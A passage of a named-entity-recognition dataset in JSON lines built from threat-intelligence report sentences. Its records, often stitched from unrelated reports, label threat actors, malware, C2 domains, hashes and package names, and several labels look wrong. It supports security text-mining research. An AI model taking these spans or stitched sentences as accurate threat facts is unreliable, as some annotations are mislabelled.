The practical relationship between security , risk , and decision making is well articulated by the US Department of Homeland Security as it is described as an approach for making security decisions .", "spans": {"ORGANIZATION: McAfee Advanced Threat Research": [[212, 243]], "ORGANIZATION: ATR": [[246, 249]], "THREAT_ACTOR: cybercrime group": [[347, 363]], "THREAT_ACTOR: Lazarus": [[364, 371]], "TOOL: sophisticated malware": [[382, 403]], "MALWARE: SniffPass": [[428, 437], [440, 449]], "ORGANIZATION: the US Department of Homeland Security": [[613, 651]]}, "info": {"id": "cyberner_stix_train_001858", "source": "cyberner_stix_train"}} {"text": "com.bmm.mobilebankingapp net.bnpparibas.mescomptes fr.banquepopulaire.cyberplus com.caisseepargne.android.mobilebanking com.palatine.android.mobilebanking.prod com.ocito.cdn.activity.creditdunord com.fullsix.android.labanquepostale.accountaccess mobi.societegenerale.mobile.lappli com.db.businessline.cardapp com.skh.android.mbanking com.ifs.banking.fiid1491 Truvasys has been involved in several attack campaigns , where it has masqueraded as one of server common computer utilities , including WinUtils , TrueCrypt , WinRAR , or SanDisk . It is distributed in a spear phishing campaign with a weaponized office document that appears to be designed to lure military personnel . 
The injected code calls out a first domain ( seen above encoded in Base64 ) and generates a Base64 response : Decoding it reveals a URL pointing to the actual skimming code , which is heavily obfuscated ( likely via obfuscator.io ): The data exfiltration is also done differently as seen in the image below .", "spans": {"TOOL: Truvasys": [[359, 367]], "ORGANIZATION: computer utilities": [[465, 483]], "ORGANIZATION: WinUtils": [[496, 504]], "ORGANIZATION: TrueCrypt": [[507, 516]], "ORGANIZATION: WinRAR": [[519, 525]], "ORGANIZATION: SanDisk": [[531, 538]], "TOOL: office": [[606, 611]], "TOOL: obfuscator.io": [[894, 907]]}, "info": {"id": "cyberner_stix_train_001859", "source": "cyberner_stix_train"}} {"text": "The code above also tells us the actors had created their own custom “ encoder ” within the AntSword Shell Manager to be able to interact with the code above , which we will discuss in detail in the next section .", "spans": {"TOOL: AntSword": [[92, 100]], "TOOL: Shell Manager": [[101, 114]]}, "info": {"id": "cyberner_stix_train_001860", "source": "cyberner_stix_train"}} {"text": "The registrant contact details of the C & C domains used in the campaign , for instance , were masked . Researchers at Kaspersky Lab privately disclosed the flaw to Adobe after exploits against the zero-day were used in March by the ScarCruft APT gang in what Kaspersky Lab is calling Operation Daybreak . This error allowed us to follow the infrastructure week by week , until an individual pushed on Twitter the heuristic to track their C2 at the end of December 2018 . 
If used successfully , the attacker can set up a proxy Microsoft 365 authentication system and steal a victim ’s authentication credentials or cookies with a “ man - in - the - middle \" attack .", "spans": {"ORGANIZATION: Kaspersky Lab": [[119, 132], [260, 273]], "VULNERABILITY: zero-day": [[198, 206]], "ORGANIZATION: Twitter": [[402, 409]], "TOOL: C2": [[439, 441]], "THREAT_ACTOR: the attacker": [[495, 507]]}, "info": {"id": "cyberner_stix_train_001861", "source": "cyberner_stix_train"}} {"text": "In 2015 , SkyEye Labs , the security research division of the Chinese firm Qihoo 360 , released a report detailing threat actors that were targeting Chinese public and private entities including government agencies , research institutes , maritime agencies , sea construction , and shipping enterprises . While OceanLotus’ targets are global , their operations are mostly active within the APAC region which encompasses targeting private sectors across multiple industries , foreign governments , activists , and dissidents connected to Vietnam .", "spans": {"ORGANIZATION: SkyEye Labs": [[10, 21]], "ORGANIZATION: Qihoo 360": [[75, 84]], "ORGANIZATION: government agencies": [[195, 214]], "ORGANIZATION: research institutes": [[217, 236]], "ORGANIZATION: maritime agencies": [[239, 256]], "ORGANIZATION: sea construction": [[259, 275]], "ORGANIZATION: shipping enterprises": [[282, 302]], "THREAT_ACTOR: OceanLotus’": [[311, 322]], "ORGANIZATION: foreign governments": [[475, 494]], "ORGANIZATION: activists": [[497, 506]], "ORGANIZATION: dissidents": [[513, 523]]}, "info": {"id": "cyberner_stix_train_001862", "source": "cyberner_stix_train"}} {"text": "Although the 2015 campaign did not focus on individuals associated with U.S. politics , open-source evidence suggests that TG-4127 targeted individuals connected to the U.S. 
White House in early 2015 .", "spans": {"THREAT_ACTOR: TG-4127": [[123, 130]]}, "info": {"id": "cyberner_stix_train_001863", "source": "cyberner_stix_train"}} {"text": "The other overlapping files are tools used by the adversary to locate other systems on the network etool.exe , check to see if they are vulnerable to CVE-2017-0144 EternalBlue patched in MS07-010 checker1.exe and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket psexec.exe . This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": {"MALWARE: etool.exe": [[99, 108]], "VULNERABILITY: CVE-2017-0144": [[150, 163]], "MALWARE: MS07-010": [[187, 195]], "MALWARE: checker1.exe": [[196, 208]], "MALWARE: PsExec": [[293, 299]], "MALWARE: psexec.exe": [[320, 330]], "TOOL: emails": [[403, 409]], "FILEPATH: Microsoft Word attachment": [[417, 442]], "VULNERABILITY: CVE-2017-0199": [[475, 488]], "MALWARE: ZeroT Trojan": [[503, 515]], "MALWARE: PlugX Remote Access Trojan": [[547, 573]], "MALWARE: RAT": [[576, 579]]}, "info": {"id": "cyberner_stix_train_001864", "source": "cyberner_stix_train"}} {"text": "The RANCOR campaign represents a continued trend of targeted attacks against entities within the South East Asia region . 
Since last week , iSIGHT Partners has worked to provide details on the power outage in Ukraine to our global customers .", "spans": {"ORGANIZATION: iSIGHT Partners": [[140, 155]], "ORGANIZATION: customers": [[231, 240]]}, "info": {"id": "cyberner_stix_train_001865", "source": "cyberner_stix_train"}} {"text": "Path – location of the root “ stash ” directory Ext – search for files with one of these extensions only Date – search for files not earlier than this date Internal name : NvCpld.dll ( from export table ) , msdetltemp.dll ( from resources ) , IGFSRVC.dll ( from resources ) File format : PE32 DLL File size : 76,288 bytes MD5s : 8b238931a7f64fddcad3057a96855f6c , ce151285e8f0e7b2b90162ba171a4b90 Linker version : 11.0 , Microsoft Visual Studio Linker timestamps : 2015.05.29 11:20:32 ( GMT ) , 2006.11.25 04:39:15 ( GMT ) Exported functions :", "spans": {"FILEPATH: NvCpld.dll": [[172, 182]], "FILEPATH: msdetltemp.dll": [[207, 221]], "FILEPATH: IGFSRVC.dll": [[243, 254]], "TOOL: DLL": [[293, 296]], "FILEPATH: 8b238931a7f64fddcad3057a96855f6c": [[329, 361]], "FILEPATH: ce151285e8f0e7b2b90162ba171a4b90": [[364, 396]], "ORGANIZATION: Microsoft": [[421, 430]], "TOOL: Visual Studio": [[431, 444]], "TOOL: GMT": [[487, 490], [517, 520]]}, "info": {"id": "cyberner_stix_train_001866", "source": "cyberner_stix_train"}} {"text": "Mitigations Stay protected from mobile malware by taking these precautions : Do not download apps from unfamiliar sites Only install apps from trusted sources Pay close attention to the permissions requested by apps Install a suitable mobile security app , such as SEP Mobile or Norton , to protect your device and data Keep your operating system up to date Make frequent backups of important data Indicators of Compromise ( IoCs ) Package names : anew.football.cup.world.com.worldcup com.coder.glancelove com.winkchat APK SHA2 : 166f3a863bb2b66bda9c76dccf9529d5237f6394721f46635b053870eb2fcc5a The publicly available backdoors and tools utilized by APT33 – 
including NANOCORE , NETWIRE , and ALFA Shell – are all available on Iranian hacking websites , associated with Iranian hackers , and used by other suspected Iranian threat groups . This dropper used an FTP with hardcoded credentials to receive its . It is therefore likely that they will try many things to compromise your mobile phone , including using zero - day attacks or unknown vulnerabilities .", "spans": {"THREAT_ACTOR: APT33": [[650, 655]], "TOOL: NANOCORE": [[668, 676]], "TOOL: NETWIRE": [[679, 686]], "TOOL: ALFA Shell": [[693, 703]], "THREAT_ACTOR: hackers": [[778, 785]], "THREAT_ACTOR: threat groups": [[824, 837]], "THREAT_ACTOR: zero - day attacks": [[1013, 1031]], "THREAT_ACTOR: unknown vulnerabilities": [[1035, 1058]]}, "info": {"id": "cyberner_stix_train_001867", "source": "cyberner_stix_train"}} {"text": "The more advanced variant , on the other hand , will use an algorithm to generate a periodically-changing Twitter account name and will then attempt to find tweets from that account containing links to the actual download location of the commands to execute .", "spans": {"TOOL: Twitter": [[106, 113]]}, "info": {"id": "cyberner_stix_train_001868", "source": "cyberner_stix_train"}} {"text": "Example of using native code for obfuscation Examples of using string concatenation for obfuscation Example of encrypting strings in the Trojan Asacub distribution geography Asacub is primarily aimed at Russian users : 98 % of infections ( 225,000 ) occur in Russia , since the cybercriminals specifically target clients of a major Russian bank . Despite multiple public disclosures of their activities , BRONZE UNION remains an active and formidable threat as of this publication . We will continue to monitor this hacking group ’s activities and their toolkit ’s developments . 
Threat actors typically register and use several domains in order to discretely lead their malware to their Command and Control ( C&C ) servers .", "spans": {"MALWARE: Asacub": [[144, 150], [174, 180]], "THREAT_ACTOR: Threat actors": [[580, 593]], "SYSTEM: several domains": [[621, 636]], "MALWARE: malware": [[671, 678]], "SYSTEM: Command and Control ( C&C ) servers": [[688, 723]]}, "info": {"id": "cyberner_stix_train_001869", "source": "cyberner_stix_train"}} {"text": "The spyware in this analysis was portraying itself as the Netflix app . Silence has conducted at least three campaigns using recon emails , followed by malicious mail sent to an updated recipient list . Additionally the reports on Carbanak show a different picture , where banks targeted outside of Russia , specifically Europe , USA and Japan are mentioned , which does not match our research .", "spans": {"SYSTEM: Netflix app": [[58, 69]], "THREAT_ACTOR: Silence": [[72, 79]], "MALWARE: Carbanak": [[231, 239]], "ORGANIZATION: banks": [[273, 278]]}, "info": {"id": "cyberner_stix_train_001870", "source": "cyberner_stix_train"}} {"text": "Phantom of the Opaera :", "spans": {}, "info": {"id": "cyberner_stix_train_001871", "source": "cyberner_stix_train"}} {"text": "Several RATs are used by PUTTER PANDA . The role of the .NET module is to deliver the known KopiLuwak JavaScript Trojan .", "spans": {"TOOL: RATs": [[8, 12]], "THREAT_ACTOR: PUTTER PANDA": [[25, 37]], "FILEPATH: .NET module": [[56, 67]], "FILEPATH: KopiLuwak JavaScript": [[92, 112]], "MALWARE: Trojan": [[113, 119]]}, "info": {"id": "cyberner_stix_train_001872", "source": "cyberner_stix_train"}} {"text": "This is part of a class called CaptureService , which already existed in the previous version but it was not duly implemented . 
If a target of the spear phishing described in \" Phase 2 : malware deployment \" opened the email attachment and , crucially , clicked on the icon in the attachment , this would lead to the target 's computer becoming infected with the \" Scout \" malware tool from the RCS Galileo platform . All but one sample that we identified were written to this folder as word.exe . During the SolarWinds Compromise , APT29 registered devices in order to enable mailbox syncing via the Set - CASMailbox command . .006", "spans": {"TOOL: Scout": [[365, 370]], "FILEPATH: word.exe": [[487, 495]], "THREAT_ACTOR: SolarWinds Compromise": [[509, 530]], "THREAT_ACTOR: APT29": [[533, 538]]}, "info": {"id": "cyberner_stix_train_001873", "source": "cyberner_stix_train"}} {"text": "One such case was detailed on page 10 as an apparent evasion attempt .", "spans": {}, "info": {"id": "cyberner_stix_train_001874", "source": "cyberner_stix_train"}} {"text": "The new wave of attacks included a new generation of USB stealers deployed by Sofacy , with initial versions dating to February 2015 .", "spans": {"MALWARE: USB stealers": [[53, 65]], "THREAT_ACTOR: Sofacy": [[78, 84]]}, "info": {"id": "cyberner_stix_train_001875", "source": "cyberner_stix_train"}} {"text": "The APT38 targeted news outlets known for their business and financial sector reporting , probably in support of efforts to identify and compromise additional financial institutions . 
The attackers upload data to the account , which is downloaded by the implant , decrypted and interpreted .", "spans": {"THREAT_ACTOR: APT38": [[4, 9]], "ORGANIZATION: news outlets": [[19, 31]], "ORGANIZATION: financial sector": [[61, 77]], "ORGANIZATION: financial institutions": [[159, 181]]}, "info": {"id": "cyberner_stix_train_001876", "source": "cyberner_stix_train"}} {"text": "Name MD5 Purpose msconf.exe 55fb01048b6287eadcbd9a0f86d21adf Main module , reverse shell network.exe f673bb1d519138ced7659484c0b66c5b Sending exfiltrated data system.exe d3baa45ed342fbc5a56d974d36d5f73f Surrounding sound recording by mic update.exe 395f9f87df728134b5e3c1ca4d48e9fa Keylogging wow.exe It appears that the attackers may have impersonated the identity of a real young woman and stole her pictures to construct the fake profile , along with a professional biography also stolen from yet another person . Putter Panda is a Chinese threat group that has been attributed to Unit 61486 of the 12th Bureau of the PLA ’s 3rd General Staff Department ( GSD ) .", "spans": {"THREAT_ACTOR: attackers": [[321, 330]], "THREAT_ACTOR: Putter Panda": [[517, 529]], "ORGANIZATION: Unit 61486 of the 12th Bureau of the PLA ’s 3rd General Staff Department": [[584, 656]], "ORGANIZATION: GSD": [[659, 662]]}, "info": {"id": "cyberner_stix_train_001877", "source": "cyberner_stix_train"}} {"text": "In this blog post we will detail our analysis of the malware and associated indicators , look closely at the decoy files , and leverage available information to make an educated guess on the possible intended target .", "spans": {}, "info": {"id": "cyberner_stix_train_001878", "source": "cyberner_stix_train"}} {"text": "This means that the malware can do anything from harvest the user 's banking credentials , to monitoring the device 's location . This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage . 
In one instance , APT37 weaponized a video downloader application with KARAE malware that was indiscriminately distributed to South Korean victims through torrent websites .", "spans": {"THREAT_ACTOR: Cloud Atlas": [[179, 190]], "THREAT_ACTOR: APT37": [[252, 257]], "MALWARE: KARAE": [[305, 310]], "MALWARE: malware": [[311, 318]]}, "info": {"id": "cyberner_stix_train_001879", "source": "cyberner_stix_train"}} {"text": "In the March attacks , the Flash object is only loaded if the user scrolls through the entire content of the delivery document and views the specific page the Flash object is embedded on .", "spans": {"TOOL: Flash": [[27, 32], [159, 164]]}, "info": {"id": "cyberner_stix_train_001880", "source": "cyberner_stix_train"}} {"text": "Finally , we have also observed victims being infected with OnionDuke after they were already infected with CozyDuke .", "spans": {"MALWARE: OnionDuke": [[60, 69]], "MALWARE: CozyDuke": [[108, 116]]}, "info": {"id": "cyberner_stix_train_001881", "source": "cyberner_stix_train"}} {"text": "n one case from 2013 , the target was sent a malicious document through a spear phishing email message . This technique hides the true C2 server from researchers that do not have access to both the rastls.dll and Sycmentec.config files .", "spans": {"MALWARE: malicious document": [[45, 63]], "TOOL: C2": [[135, 137]], "FILEPATH: rastls.dll": [[198, 208]], "FILEPATH: Sycmentec.config files": [[213, 235]]}, "info": {"id": "cyberner_stix_train_001882", "source": "cyberner_stix_train"}} {"text": "fli.fedora-dns-update.com Whoisguard Unknown Unknown .", "spans": {"DOMAIN: fli.fedora-dns-update.com": [[0, 25]], "TOOL: Whoisguard": [[26, 36]]}, "info": {"id": "cyberner_stix_train_001884", "source": "cyberner_stix_train"}} {"text": "While both back door Trojans wait for commands from the threat actor , they can search for files and upload them to the specified server once activated . 
In this blog post we'll analyze two specific incidents apparently targeting victims in Vietnam and in India and we'll describe the capabilities of the custom backdoor being used that for convenience ( and to our knowledge , for a lack of an existing name ) we call KeyBoy , due to a string present in one of the samples .", "spans": {"THREAT_ACTOR: threat actor": [[56, 68]], "MALWARE: backdoor": [[312, 320]], "MALWARE: KeyBoy": [[419, 425]]}, "info": {"id": "cyberner_stix_train_001885", "source": "cyberner_stix_train"}} {"text": "Like previously added functionality , the code is borrowed from the leaked Anubis Trojan source code . Most recently , on December 20 , 2018 , the U.S. Department of Justice charged two hackers associated with the Chinese Ministry of State Security (MSS) with global computer intrusion campaigns targeting intellectual property . As Kaspersky and Cybereason recently posted , Minzen is a modular malware that has both 32-bit and 64-bit components in its resource section or configuration data in its body .", "spans": {"MALWARE: Anubis": [[75, 81]], "ORGANIZATION: U.S. Department": [[147, 162]], "THREAT_ACTOR: hackers": [[186, 193]], "ORGANIZATION: Kaspersky": [[333, 342]], "ORGANIZATION: Cybereason": [[347, 357]], "MALWARE: Minzen": [[376, 382]]}, "info": {"id": "cyberner_stix_train_001886", "source": "cyberner_stix_train"}} {"text": "After the demise of Storm , it was replaced by another new botnet known as Waledac that also leveraged peer-to-peer communications . 
Through the information exchanges used by people in the security industry , we learned that several Russian banks were struggling with malicious programs created specifically to attack a particular type of legal banking software .", "spans": {"TOOL: Waledac": [[75, 82]], "ORGANIZATION: security industry": [[189, 206]], "ORGANIZATION: banks": [[241, 246]]}, "info": {"id": "cyberner_stix_train_001887", "source": "cyberner_stix_train"}} {"text": "The password of the sample we analyzed is : “ 6y7u^Y&U6y7u^Y&U6y7u^Y&U ” .", "spans": {}, "info": {"id": "cyberner_stix_train_001888", "source": "cyberner_stix_train"}} {"text": "In later versions , when it starts , the Trojan additionally opens a phishing site in the browser that simulates a free ad service so as to dupe the user into entering their login credentials and bank card details . In addition to the spear phishes , FireEye ISIGHT Intelligence has observed APT10 accessing victims through global service providers . The first document was in English and a second in Russian .", "spans": {"ORGANIZATION: FireEye ISIGHT Intelligence": [[251, 278]], "THREAT_ACTOR: APT10": [[292, 297]]}, "info": {"id": "cyberner_stix_train_001889", "source": "cyberner_stix_train"}} {"text": "By implementing best practices for phishing-type attacks—such as refraining from downloading files unless they are absolutely certain that they come from trustworthy sources—users can avoid being victimized by malware such as OSX_DOK.C that prey on users who lack awareness of phishing strategies .", "spans": {"MALWARE: OSX_DOK.C": [[226, 235]]}, "info": {"id": "cyberner_stix_train_001890", "source": "cyberner_stix_train"}} {"text": "The Trojan sends an email to sahro.bella7@post.cz with sysscr.ops as the attachment , the string SCreen within the body and a subject with the unique system identifier via SMTPS from one of three previously used accounts .", "spans": {"MALWARE: Trojan": [[4, 10]], "TOOL: email": [[20, 25]], "EMAIL: sahro.bella7@post.cz": 
[[29, 49]], "FILEPATH: sysscr.ops": [[55, 65]]}, "info": {"id": "cyberner_stix_train_001891", "source": "cyberner_stix_train"}} {"text": "Another example of FakeSpy ’ s anti-emulation techniques is how it uses the getMachine function , which uses the TelephonyManager class to check for the deviceID , phone number , IMEI , and IMSI . After a successful penetration , FIN7 uses its own backdoors and the CobaltStrike framework or Powershell Empire components to hop to interesting parts of the network , where it can monetize its access . MyWeb is the second-generation malware used by Ke3chang .", "spans": {"MALWARE: FakeSpy": [[19, 26]], "THREAT_ACTOR: FIN7": [[230, 234]], "TOOL: backdoors": [[248, 257]], "TOOL: CobaltStrike framework": [[266, 288]], "TOOL: Powershell": [[292, 302]], "MALWARE: MyWeb": [[401, 406]], "THREAT_ACTOR: Ke3chang": [[448, 456]]}, "info": {"id": "cyberner_stix_train_001892", "source": "cyberner_stix_train"}} {"text": "In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers , email clients , messengers , etc , and can act as a keylogger . 
To spread the Corkow malware criminals use a drive-by downloads method , when victims are infected while visiting compromised legitimate websites .", "spans": {"MALWARE: AveMaria": [[10, 18]]}, "info": {"id": "cyberner_stix_train_001893", "source": "cyberner_stix_train"}} {"text": "Firstly , as with the MiniDuke campaigns of February 2013 and CosmicDuke campaigns in the summer of 2014 , again the group clearly prioritized the continuation of their operations over maintaining stealth .", "spans": {"MALWARE: MiniDuke": [[22, 30]], "MALWARE: CosmicDuke": [[62, 72]]}, "info": {"id": "cyberner_stix_train_001894", "source": "cyberner_stix_train"}} {"text": "In comparison to other threat groups , TG-3390 is notable for its tendency to compromise Microsoft Exchange servers using a custom backdoor and credential logger .", "spans": {"THREAT_ACTOR: TG-3390": [[39, 46]], "ORGANIZATION: Microsoft": [[89, 98]], "TOOL: Exchange": [[99, 107]]}, "info": {"id": "cyberner_stix_train_001895", "source": "cyberner_stix_train"}} {"text": "The Flash exploit is mostly unobfuscated with only some light variable name mangling .", "spans": {"TOOL: Flash": [[4, 9]]}, "info": {"id": "cyberner_stix_train_001896", "source": "cyberner_stix_train"}} {"text": "The information related to DeltaCharlie from the Operation Blockbuster Destructive Malware report should be viewed in conjunction with the IP S-PROT addresses listed in the .csv and .stix files provided within this alert .", "spans": {"MALWARE: DeltaCharlie": [[27, 39]], "TOOL: IP S-PROT addresses": [[139, 158]], "FILEPATH: .csv": [[173, 177]], "FILEPATH: .stix": [[182, 187]]}, "info": {"id": "cyberner_stix_train_001897", "source": "cyberner_stix_train"}} {"text": "The basic functionality of the new documents and their PowerShell components matched what was previously disclosed .", "spans": {"TOOL: PowerShell": [[55, 65]]}, "info": {"id": "cyberner_stix_train_001898", "source": "cyberner_stix_train"}} {"text": "It shows that the malware can 
detect whether it ’ s running in an emulated environment or a real mobile device , and can change its code pattern accordingly . In 2018-2019 , researchers of Kaspersky Lab’s Global Research and Analysis Team analyzed various campaigns that used the same Tactics Tools and Procedures (TTPs) as the historic FIN7 , leading the researchers to believe that this threat actor had remained active despite the 2018 arrests . A trait common to all three malware families we analyzed is that they use the IWebBrowser2 COM interface to perform their CnC communication .", "spans": {"ORGANIZATION: Kaspersky": [[189, 198]], "THREAT_ACTOR: FIN7": [[337, 341]], "THREAT_ACTOR: threat actor": [[389, 401]], "MALWARE: IWebBrowser2 COM": [[527, 543]]}, "info": {"id": "cyberner_stix_train_001899", "source": "cyberner_stix_train"}} {"text": "Time delay to postpone displaying ads implemented by the adware Once the malicious app receives its configuration data , the affected device is ready to display ads as per the attacker ’ s choice ; each ad is displayed as a full screen activity . North Korea linked hackers are among the most prolific nation-state threats , targeting not only the U.S. and South Korea but the global financial system and nations worldwide . Moreover the metadata of the Office document contains the names of people who seems to work for a public organization .", "spans": {"ORGANIZATION: financial": [[384, 393]], "ORGANIZATION: nations": [[405, 412]], "TOOL: Office": [[454, 460]]}, "info": {"id": "cyberner_stix_train_001900", "source": "cyberner_stix_train"}} {"text": "But GPlayed is an example of where this can go wrong , especially if a mobile user is not aware of how to distinguish a fake app versus a real one . 360 Threat Intelligence Center has reported on related indicators being attributed to BITTER APT a South Asian country suspected Indian APT in open source reporting . 
Specifically , the targeting of organizations in the aerospace and energy sectors indicates that the APT33 is likely in search of strategic intelligence capable of benefitting a government or military sponsor .", "spans": {"MALWARE: GPlayed": [[4, 11]], "ORGANIZATION: 360 Threat Intelligence Center": [[149, 179]], "THREAT_ACTOR: BITTER APT": [[235, 245]], "ORGANIZATION: aerospace": [[369, 378]], "ORGANIZATION: energy sectors": [[383, 397]], "THREAT_ACTOR: APT33": [[417, 422]], "ORGANIZATION: government": [[494, 504]], "ORGANIZATION: military": [[508, 516]]}, "info": {"id": "cyberner_stix_train_001901", "source": "cyberner_stix_train"}} {"text": "The information discovered by Unit 42 and shared here indicates Scarlet Mimic is likely a well-funded and skillfully resourced cyber adversary . APT10 is known to have exfiltrated a high volume of data from multiple victims , exploiting compromised MSP networks , and those of their customers , to stealthily move this data around the world .", "spans": {"ORGANIZATION: Unit 42": [[30, 37]], "THREAT_ACTOR: Scarlet Mimic": [[64, 77]], "THREAT_ACTOR: APT10": [[145, 150]], "MALWARE: MSP networks": [[249, 261]], "ORGANIZATION: customers": [[283, 292]]}, "info": {"id": "cyberner_stix_train_001902", "source": "cyberner_stix_train"}} {"text": "This sample is similar to those presented in other recent Marcher analyses [ 1 ] [ 2 ] . Cisco Talos will continue to monitor Sea Turtle and work with our partners to understand the threat as it continues to evolve to ensure that our customers remain protected and the public is informed . This group is responsible for the campaigns known as Operation Clandestine Fox , Operation Clandestine Wolf , and Operation Double Tap .", "spans": {"MALWARE: Marcher": [[58, 65]], "ORGANIZATION: Cisco Talos": [[89, 100]]}, "info": {"id": "cyberner_stix_train_001903", "source": "cyberner_stix_train"}} {"text": "] com hxxp : //nttdocomo-qaq [ . 
The primary targets of APT28 are potential victims in several countries such as Ukraine , Spain , Russia , Romania , the United States and Canada . The Carbon Black ThreatSight team observed an interesting campaign over the last month . One initiative in the European Union has helped more than 1.5 million ransomware victims .", "spans": {"THREAT_ACTOR: APT28": [[56, 61]], "ORGANIZATION: Carbon Black ThreatSight": [[185, 209]], "ORGANIZATION: European Union": [[292, 306]], "ORGANIZATION: ransomware victims": [[340, 358]]}, "info": {"id": "cyberner_stix_train_001904", "source": "cyberner_stix_train"}} {"text": "The first method is to send a specially crafted URL to the target via SMS or email . As with previous campaigns , and as highlighted in our annual M-Trends 2017 report , FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process . the assignment variable is called “ block update variable ” CrowdStrike security researchers were working to develop proof - of - concept ( POC ) code for an exploit method indicative of the logging present after recent Play ransomware attacks .", "spans": {"ORGANIZATION: M-Trends": [[147, 155]], "THREAT_ACTOR: FIN7": [[170, 174]], "ORGANIZATION: CrowdStrike security researchers": [[373, 405]], "THREAT_ACTOR: Play ransomware attacks": [[533, 556]]}, "info": {"id": "cyberner_stix_train_001905", "source": "cyberner_stix_train"}} {"text": "Attacks on the chemical industry are merely their latest attack wave .", "spans": {}, "info": {"id": "cyberner_stix_train_001906", "source": "cyberner_stix_train"}} {"text": "By utilizing a hook library , it is more complicated for users to manually detect and remove the infection from their systems , giving the threat actors more time to generate profit . 
PyLocky was found to be targeting entities in France and Germany .", "spans": {"TOOL: hook library": [[15, 27]], "MALWARE: PyLocky": [[184, 191]]}, "info": {"id": "cyberner_stix_train_001907", "source": "cyberner_stix_train"}} {"text": "Kaspersky goes on to state that by obtaining log files from the MiniDuke command and control servers , they were able to identify high-profile victims from Ukraine , Belgium , Portugal , Romania , the Czech Republic , Ireland , the United States and Hungary .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "MALWARE: MiniDuke": [[64, 72]], "TOOL: command and control": [[73, 92]]}, "info": {"id": "cyberner_stix_train_001908", "source": "cyberner_stix_train"}} {"text": "In certain situations , variants intercept compromised apps ’ original legitimate ads display events and report back to the intended ad-exchange with the “ Agent Smith ” campaign hacker ’ s ad IDs . The pie chart in Figure 8 shows that the vast majority ( 73% ) of the hosts are geographically located in Thailand , which matches the known targeting of this threat group . Given the threat ’s persistence mechanisms , polymorphism , and use of fileless techniques , behavior-based detection was a critical component of the comprehensive protection against this malware and other threats that exhibit similar malicious behaviors . They also used AdFind to enumerate domains and to discover trust between federated domains .", "spans": {"MALWARE: Agent Smith": [[156, 167]], "TOOL: AdFind": [[645, 651]]}, "info": {"id": "cyberner_stix_train_001909", "source": "cyberner_stix_train"}} {"text": "Why Whitefly uses these two different loaders in some of its attacks remains unknown . 
The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 ( EternalBlue ) that we saw uploaded to the other errr.aspx webshell .", "spans": {"THREAT_ACTOR: Whitefly": [[4, 12]], "TOOL: loaders": [[38, 45]], "MALWARE: python script": [[150, 163]], "VULNERABILITY: CVE-2017-0144": [[219, 232]], "VULNERABILITY: EternalBlue": [[235, 246]], "FILEPATH: errr.aspx": [[283, 292]]}, "info": {"id": "cyberner_stix_train_001910", "source": "cyberner_stix_train"}} {"text": "ba9f4d3f4eba3fa7dce726150fe402e37359a7f36c07f3932a92bd711436f88c e194268bf682d81fc7dc1e437c53c952ffae55a9d15a1fc020f0219527b7c2ec С & C 2014–2015 : secondby.ru darkclub.net holerole.org googleapis.link 2015–2016 : test2016.ru blackstar.pro synchronize.pw lineout.pw sync-weather.pw The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio . APT40 engages in broader regional targeting against traditional intelligence targets , especially organizations with operations in Southeast Asia .", "spans": {"MALWARE: Android version": [[286, 301]], "THREAT_ACTOR: APT40": [[404, 409]]}, "info": {"id": "cyberner_stix_train_001911", "source": "cyberner_stix_train"}} {"text": "After an infected app is installed , it sends data about the device to the campaign ’ s Command and Control ( C & C ) server . The APT39 were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage operation . , Command messages are used in ICS networks to give direct instructions to control systems devices .", "spans": {"THREAT_ACTOR: APT39": [[131, 136]]}, "info": {"id": "cyberner_stix_train_001912", "source": "cyberner_stix_train"}} {"text": "It can also create a simple HTTP server on the infected device to deceive victims . Buhtrap still make extensive use of NSIS installers as droppers and these are mainly delivered through malicious documents . 
Thus , the script provides to run “ winserv.exe ” .", "spans": {"THREAT_ACTOR: Buhtrap": [[84, 91]], "THREAT_ACTOR: NSIS installers": [[120, 135]], "FILEPATH: winserv.exe": [[245, 256]]}, "info": {"id": "cyberner_stix_train_001913", "source": "cyberner_stix_train"}} {"text": "All of these Google Play Store pages have been taken down by Google . The email address is associated with the Lebanese domain of a major global financial institution . The persistence is achieved by adding an entry with the name \" ChromeUpdater \" to the ' Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run ' . From what we ’ve seen in Hack520 ’s blog , as well as the infrastructure deployed around it , it is quite safe to say that Hack520 is involved in aspects of the VPS service activity provided to groups like Winnti and other cybercriminals or threat actors .", "spans": {"SYSTEM: Google Play Store": [[13, 30]], "ORGANIZATION: Google": [[61, 67]], "ORGANIZATION: financial institution": [[145, 166]], "SYSTEM: VPS service": [[472, 483]], "THREAT_ACTOR: Winnti": [[517, 523]], "THREAT_ACTOR: threat actors": [[552, 565]]}, "info": {"id": "cyberner_stix_train_001914", "source": "cyberner_stix_train"}} {"text": "This made us believe the two groups were connected , although it looks they split ways at a certain point , with the original Miniduke group switching to the CosmicDuke implant in 2014 .", "spans": {"THREAT_ACTOR: Miniduke": [[126, 134]], "MALWARE: CosmicDuke": [[158, 168]]}, "info": {"id": "cyberner_stix_train_001915", "source": "cyberner_stix_train"}} {"text": "APT28 : New Espionage Operations Target Military and Government Organizations .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]], "ORGANIZATION: Military and Government Organizations": [[40, 77]]}, "info": {"id": "cyberner_stix_train_001916", "source": "cyberner_stix_train"}} {"text": "Older versions of these USBSTEALER modules were previously described by our colleagues from ESET .", "spans": {"TOOL: USBSTEALER": [[24, 34]], 
